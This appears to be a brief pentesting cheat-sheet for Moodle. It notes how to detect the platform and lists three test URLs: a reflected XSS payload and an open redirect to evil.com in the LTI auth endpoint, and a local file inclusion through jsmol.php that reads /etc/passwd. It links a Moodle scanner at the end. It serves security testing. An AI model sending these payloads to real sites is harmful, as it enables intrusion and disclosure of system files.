Moodle

Detection

Source code

<meta name="keywords" content="moodle,

Tests

1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter

https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)

1. Open redirect in /mod/lti/auth.php in "redirect_url" parameter

https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com

1. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter

https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd

Moodle Scanner

GitHub - LuemmelSec/Moodle-Scanner: A Moodle ScannerGitHub